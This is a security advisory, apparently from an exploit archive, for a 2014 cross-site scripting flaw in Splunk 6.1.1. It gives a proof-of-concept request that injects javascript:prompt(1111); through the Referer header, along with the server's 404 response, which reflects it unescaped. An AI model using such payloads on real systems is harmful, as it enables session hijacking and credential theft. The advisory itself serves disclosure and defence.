Splunk 6.1.1 Cross Site Scripting

Splunk 6.1.1 Cross Site Scripting: Posted May 27, 2014; Authored by Asheesh Kumar Mani Tripathi; Splunk version 6.1.1 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 7a31ef4fcee869912b77477df42034cdbbb008b74b988e45e6ecd10d53c1f5cc; Download | Favorite | View

Splunk 6.1.1 Cross Site Scripting

================================================================================================================================================================
 
                  Splunk Version v6.1.1  cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
 

#Date- 27/5/2014

# code by Asheesh kumar Mani Tripathi
 
     
 
# Credit by Asheesh Anaconda
 
 
 
#Vulnerbility
  Splunk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities 
 
 
========================================================================================================================
 
                                                           Request
========================================================================================================================

GET /en-US/app/ HTTP/1.1
Referer: javascript:prompt(1111);
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie: session_id_8000=9961be37412131609c9c4942a7bca65cc5110e6c; cval=1992808981; uid=C39F57A0-4BFB-4CD7-AAA1-4FD388E15923
Host: 192.168.1.3:8000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*



========================================================================================================================
 
                                                           Response 
========================================================================================================================





<html xmlns="http://www.w3.org/1999/xhtml" xmlns:splunk="http://www.splunk.com/xhtml-extensions/1.0" xml:lang="en">
<head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/en-US/static/@207789/img/favicon.ico" />
    <title>The path '/en-US/app/' was not found. - Splunk</title>
    <style>
    
        *       { margin: 0; padding: 0; }
        body    { font-family: helvetica, arial, sans-serif; color: #333; padding: 20px; }
        p,pre   { margin-bottom: 1em; font-size: .8em; }
        .status { font-size: .7em; color: #999; margin-bottom: 1em; }
        .msg    { margin-bottom: 1em; font-size: 1.4em;}
        pre     { font-family: Monaco,Courier Bold,Courier New,monospace; font-size: .7em;background-color: #eee;  padding: 5px;}
        #toggle { font-size: .8em; margin-bottom: 1em; }
        .byline { color: #555; }
        .byline span { font-weight: bold; line-height: 1.4em; }
        hr      { height: 1px; background-color: #ccc; border: 0; margin: 20px 0 10px; }
        h2      { font-size: 1em; margin-bottom: 1em; }
        table   { border-collapse: collapse; }
        td      { padding: 2px; }
        td.k    { font-family: helvetica, arial, sans-serif; font-weight: bold; }
        #debug  { display: none; }
        
        #crashes { margin: 20px 0; padding: 10px; border: 1px solid #800; }
        #crashes dt { font-size: 12px; margin-bottom: 5px; }
        #crashes dd { white-space: pre; background: #f2f2f2; padding: 10px; margin-left: 20px; display: none; font: 10px Monaco,Courier Bold,Courier New,monospace; }
        
    </style>
    <script>
        function toggle(what) {
            what = document.getElementById(what);
            if (what.style.display == 'block') {
                what.style.display = 'none';
            } else {
                what.style.display = 'block';
            }
        }
    </script>
</head>
<body>
    <p class="status">404 Not Found</p>
    <p class="homelink"><a href="/">Return to Splunk home page</a></p>
    <h1 class="msg">The path '/en-US/app/' was not found.</h1>
    <a href="/en-US/app/search/search?q=index%3D_internal%20host%3D%22admin-PC%22%20source%3D%2Aweb_service.log%20log_level%3DERROR%20requestid%3D538456422b3c01ef0" target="_blank">View more information about your request (request ID = 538456422b3c01ef0) in Search</a>
    <br />
    <br />
    
    <p>This page was linked to from <a href="javascript:prompt(1111);">javascript:prompt(1111);</a>.</p>
    <br />
    <br />
    
 [... Redacted for Brevity ...]

Top Authors In Last 30 Days

Red Hat 282 files
Ubuntu 65 files
Debian 22 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
gabe_k 3 files
Google Security Research 3 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

Splunk 6.1.1 Cross Site Scripting

Splunk 6.1.1 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Splunk 6.1.1 Cross Site Scripting

Share This

Splunk 6.1.1 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems